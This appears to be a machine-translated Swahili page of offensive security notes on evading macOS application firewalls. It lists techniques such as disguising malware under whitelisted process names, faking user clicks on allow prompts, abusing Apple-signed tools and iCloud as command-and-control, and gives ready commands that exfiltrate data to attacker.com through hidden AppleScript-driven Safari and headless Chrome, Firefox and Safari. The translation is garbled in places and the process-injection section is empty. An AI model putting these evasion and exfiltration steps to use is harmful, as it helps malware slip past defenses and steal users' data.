Mbinu Zilizopatikana

Mbinu zifuatazo zilipatikana zikifanya kazi kwenye baadhi ya programu za firewall za macOS.

Kutumia majina ya orodha nyeupe vibaya

• Kwa mfano kuita zisizo na programu hasidi majina ya michakato inayojulikana vizuri ya macOS kama vile launchd

Bonyeza ya Kisynthetic

• Ikiwa firewall inauliza idhini kwa mtumiaji, fanya zisizo na programu hasidi bonyeza kwenye ruhusu

Tumia programu zilizosainiwa na Apple

• Kama vile curl, lakini pia nyingine kama whois

Vipeni vya Apple vilivyofahamika

Firewall inaweza kuruhusu uhusiano kwenye vikoa vya Apple vilivyofahamika kama vile apple.com au icloud.com. Na iCloud inaweza kutumika kama C2.

Kupitisha Kwa Ujumla

Mawazo kadhaa kujaribu kupitisha firewalls

Angalia trafiki iliyoruhusiwa

Kujua trafiki iliyoruhusiwa kutakusaidia kutambua vikoa vilivyowekwa kwenye orodha nyeupe au ni programu zipi zilizoruhusiwa kufikia vikoa hivyo.

lsof -i TCP -sTCP:ESTABLISHED

Kutumia DNS

Ufumbuzi wa DNS unafanywa kupitia programu iliyosainiwa ya mdnsreponder ambayo labda itaruhusiwa kuwasiliana na seva za DNS.

Kupitia Programu za Kivinjari

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Kupitia sindano za michakato

Ikiwa unaweza kuingiza nambari ndani ya mchakato ambao una ruhusa ya kuunganisha kwenye seva yoyote unaweza kudukua kinga ya firewall:

Marejeo

• https://www.youtube.com/watch?v=UlT5KFTMn2k